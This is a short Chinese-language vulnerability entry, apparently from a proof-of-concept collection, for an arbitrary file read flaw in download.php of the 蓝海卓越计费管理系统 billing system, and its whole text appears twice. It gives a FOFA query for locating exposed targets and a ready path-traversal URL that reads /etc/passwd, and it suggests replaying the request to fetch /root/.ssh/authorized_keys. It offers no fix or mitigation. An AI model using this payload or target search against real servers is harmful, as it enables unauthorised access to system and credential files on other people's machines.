漏洞名称:
蓝海卓越计费管理系统 download.php 任意文件读取漏洞
描述:
攻击者通过 ../ 遍历目录可以读取服务器上的敏感文件
影响版本:
蓝海卓越计费管理系统
fofa:
title==“蓝海卓越计费管理系统”
查看/etc/passwd
http://xx.xx.xx.xx/download.php?file=../../../../../etc/passwd
数据包重放,查看/root/.ssh/authorized_keys
漏洞名称:
蓝海卓越计费管理系统 download.php 任意文件读取漏洞
描述:
攻击者通过 ../ 遍历目录可以读取服务器上的敏感文件
影响版本:
蓝海卓越计费管理系统
fofa:
title==“蓝海卓越计费管理系统”
查看/etc/passwd
http://xx.xx.xx.xx/download.php?file=../../../../../etc/passwd
数据包重放,查看/root/.ssh/authorized_keys